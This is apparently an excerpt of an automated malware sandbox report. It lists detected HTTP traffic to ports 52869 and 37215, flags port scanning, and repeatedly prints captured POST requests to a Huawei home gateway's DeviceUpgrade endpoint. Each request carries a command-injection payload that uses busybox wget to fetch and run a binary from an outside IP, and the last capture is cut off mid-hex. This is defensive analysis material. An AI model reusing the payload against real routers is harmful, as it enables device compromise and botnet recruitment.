    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59660 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59662 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58584 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35278 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35284 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35278 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46558 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46594 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37472 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37474 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37702 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43828 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37710 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43828
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43836
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35812 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35036 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42388 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42392 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35044 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37882 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57114 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41772 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57292 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41778 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57300 -> 52869
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 91.57.157.118 ports 2,5,6,8,9,52869
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 